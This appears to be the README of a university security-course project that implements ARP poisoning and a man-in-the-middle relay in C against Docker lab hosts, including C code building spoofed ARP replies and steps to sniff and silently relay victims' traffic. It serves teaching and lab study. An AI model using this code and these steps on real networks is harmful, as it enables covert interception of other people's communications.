BUET UGCSE406 Project: ARP spoofing and man-in-the-middle attack
3N4N/mitm
Man in the Middle Attack

A project for BUET security course UGCSE406.

This repository contains an implementation of a Man-in-the-Middle attack in C. The directory spoofer/ contains the code for ARP poisoning, and sniffer/ contains the code for sniffing and relaying the packets.

How to run

Setting up hosts

First, you'll need two hosts on your network. For the hosts I used docker containers, whose configuration is stored in ./labsetup/docker-compose.yml. The compose file is written for my own setup, so read through it and change whatever you need to (especially the volumes section for Host M).

| Host Name | IP Address | MAC Address |
|-----------|------------|-------------|
| Host A | 10.9.0.5 | 02:42:0a:09:00:05 |
| Host B | 10.9.0.6 | 02:42:0a:09:00:06 |
| Host M (attacker) | 10.9.0.105 | 02:42:0a:09:00:69 |

Here are some aliases and a helper function that make working with docker less tedious. Put the following codeblock in your ~/.bashrc.

alias dcbuild='docker-compose build'
alias dcup='docker-compose up'
alias dcdown='docker-compose down'
# List running containers as "<id>  <name>"
alias dockps='docker ps --format "{{.ID}}  {{.Names}}"'
# Open a shell in a container: docksh <container-id-or-name>
docksh() { docker exec -it "$1" /bin/bash; }

Starting communication

This project can handle both ICMP and TCP. (UDP support is planned for the future.) So, first you'll want to set up an ICMP or TCP conversation between two hosts on your network. Use ping for ICMP and nc for TCP.

The following codeblock is an example of setting up ICMP communication between Host-A and Host-B.

# At Host-A
ping 10.9.0.6 # where 10.9.0.6 is the IP address of Host-B

# At Host-B
tcpdump -i eth0 -n icmp

And the codeblock below is an example of similar communication but with TCP protocol.

# On Host-B (server, IP address is 10.9.0.6)
nc -lp 9090

# On Host-A (client)
nc 10.9.0.6 9090

In both of these cases it looks like Host-A is the sender and Host-B the receiver, but in fact both hosts send and receive packets at the same time. So we'll have to poison both hosts' ARP caches and relay each host's packets to the other.

Building the project

A makefile at the project root invokes the makefiles for each of the two programs in spoofer/ and sniffer/. The makefiles are written specifically for Linux, so you'll have to work out your own build steps on Windows or macOS.

ARP poisoning

In order to launch a mitm attack, we'll first have to poison the ARP caches of both the hosts. To do that simply run the following command from the project directory.

# binary_file   Host-A   Host-B   Interface
./spoofer/spoof 10.9.0.5 10.9.0.6 eth0

The spoofer then repeatedly sends unsolicited ARP replies: to Host-A it claims that 10.9.0.6 (Host-B) is at Host-M's MAC address, and to Host-B it claims that 10.9.0.5 (Host-A) is at Host-M's MAC address. Once both caches hold these entries, every packet Host-A sends to Host-B, and every packet Host-B sends to Host-A, arrives at Host-M (the attacker) instead. The replies have to be repeated because a genuine ARP exchange between the victims, or a cache timeout, would restore the real entries.
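The frames the spoofer has to put on the wire are ordinary ARP "is-at" replies with a false sender address. The block below is an added example, not the spoofer's own code: it builds the two replies for the lab topology in the table above (Host-A is told that 10.9.0.6 is at M's MAC, Host-B that 10.9.0.5 is at M's MAC). The function names, the helper layout and the reuse of the lab addresses are this example's assumptions; only the byte layout is fixed by the Ethernet and ARP formats.

```c
/*
 * Added example, not the spoofer's own code: build the two ARP replies the
 * poisoning step relies on. Function names and helpers are this example's
 * assumptions; the 42-byte frame layout is what Ethernet + ARP prescribe.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>

#define MAC_LEN        6
#define ARP_ETHERTYPE  0x0806
#define ARP_OP_REPLY   2
#define ARP_FRAME_LEN  42   /* 14-byte Ethernet header + 28-byte ARP payload */

/* Parse "02:42:0a:09:00:69" into six bytes. Returns 0 on success, -1 on error. */
int parse_mac(const char *s, uint8_t mac[MAC_LEN]) {
    unsigned v[MAC_LEN];
    if (sscanf(s, "%x:%x:%x:%x:%x:%x", &v[0], &v[1], &v[2], &v[3], &v[4], &v[5]) != MAC_LEN)
        return -1;
    for (int i = 0; i < MAC_LEN; i++) mac[i] = (uint8_t)v[i];
    return 0;
}

/*
 * Write an Ethernet + ARP "is-at" reply into buf. It tells the host at
 * target_mac/target_ip that claimed_ip lives at sender_mac, which is the lie
 * the poisoning depends on. Returns the frame length (42) or -1 on bad input.
 */
int build_arp_reply(uint8_t *buf, size_t buflen,
                    const uint8_t sender_mac[MAC_LEN], const char *claimed_ip,
                    const uint8_t target_mac[MAC_LEN], const char *target_ip) {
    struct in_addr sip, tip;
    if (buflen < ARP_FRAME_LEN) return -1;
    if (inet_pton(AF_INET, claimed_ip, &sip) != 1) return -1;
    if (inet_pton(AF_INET, target_ip, &tip) != 1) return -1;

    uint8_t *p = buf;
    memcpy(p, target_mac, MAC_LEN); p += MAC_LEN;   /* Ethernet dst: the victim */
    memcpy(p, sender_mac, MAC_LEN); p += MAC_LEN;   /* Ethernet src: the attacker */
    *p++ = ARP_ETHERTYPE >> 8; *p++ = ARP_ETHERTYPE & 0xff;
    *p++ = 0x00; *p++ = 0x01;                       /* htype: Ethernet */
    *p++ = 0x08; *p++ = 0x00;                       /* ptype: IPv4 */
    *p++ = MAC_LEN; *p++ = 4;                       /* hlen, plen */
    *p++ = 0x00; *p++ = ARP_OP_REPLY;               /* opcode: reply */
    memcpy(p, sender_mac, MAC_LEN); p += MAC_LEN;   /* sender hw addr: attacker's MAC ... */
    memcpy(p, &sip.s_addr, 4);      p += 4;         /* ... paired with the IP it claims */
    memcpy(p, target_mac, MAC_LEN); p += MAC_LEN;   /* target hw addr: the victim */
    memcpy(p, &tip.s_addr, 4);      p += 4;         /* target proto addr: the victim's IP */
    return (int)(p - buf);
}

/* The two replies for the lab topology: A learns "B is at M", B learns "A is at M". */
int build_poison_pair(uint8_t to_a[ARP_FRAME_LEN], uint8_t to_b[ARP_FRAME_LEN]) {
    uint8_t mac_a[MAC_LEN], mac_b[MAC_LEN], mac_m[MAC_LEN];
    if (parse_mac("02:42:0a:09:00:05", mac_a) != 0 ||
        parse_mac("02:42:0a:09:00:06", mac_b) != 0 ||
        parse_mac("02:42:0a:09:00:69", mac_m) != 0)
        return -1;
    if (build_arp_reply(to_a, ARP_FRAME_LEN, mac_m, "10.9.0.6", mac_a, "10.9.0.5") != ARP_FRAME_LEN)
        return -1;
    if (build_arp_reply(to_b, ARP_FRAME_LEN, mac_m, "10.9.0.5", mac_b, "10.9.0.6") != ARP_FRAME_LEN)
        return -1;
    return 0;
}

static void hexdump(const char *label, const uint8_t *buf, size_t n) {
    printf("%s:", label);
    for (size_t i = 0; i < n; i++) printf("%s%02x", i % 16 == 0 ? "\n  " : " ", buf[i]);
    printf("\n");
}

int main(void) {
    uint8_t to_a[ARP_FRAME_LEN], to_b[ARP_FRAME_LEN];
    if (build_poison_pair(to_a, to_b) != 0) { fprintf(stderr, "bad address\n"); return 1; }
    hexdump("reply to Host-A (10.9.0.6 is-at 02:42:0a:09:00:69)", to_a, ARP_FRAME_LEN);
    hexdump("reply to Host-B (10.9.0.5 is-at 02:42:0a:09:00:69)", to_b, ARP_FRAME_LEN);
    return 0;
}
```

The program only builds and prints the frames, so it runs without root. To poison the caches, a spoofer writes these 42 bytes to an AF_PACKET raw socket bound to eth0 and repeats them every second or so for as long as the relay runs. One caveat worth knowing before you wonder why nothing happens: a Linux victim normally only updates an existing neighbour entry from an unsolicited reply, it does not create a new one, so let Host-A and Host-B exchange a few packets (the ping or nc session above) before you start poisoning.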

Sniff and Relay

Now that we've successfully poisoned the ARP caches of the victim hosts, we'll need to sniff the incoming packets and relay them back to their intended target, so that the victims will not know they have been attacked.

Before launching the sniffer, remember to turn IP forwarding off. Normally you'd turn it on, because the kernel would then forward the sniffed packets to their real destination on its own. But the kernel would also resolve the victims' real MAC addresses with ARP traffic of its own, which clashes with the entries we spoofed, and every packet would be relayed twice, once by the kernel and once by the sniffer. So we relay the packets ourselves.

# Turn IP forwarding off
sysctl net.ipv4.ip_forward=0

# Turn IP forwarding on
sysctl net.ipv4.ip_forward=1

With IP forwarding off, you can now launch the sniffer. It sniffs the packets, logs them to a file named snifflog, and relays them to their intended target.

Note: the sniffer takes no arguments. It reads the victims' addresses from the file ipmacinfo, which the spoofer writes relative to the directory it was started from. If the sniffer can't find ipmacinfo, make sure you launched the spoofer from the project root with ./spoofer/spoof and not with cd spoofer/ && ./spoof.

./sniffer/sniff

Acknowledgments

This project would not have been completed without the following resources:
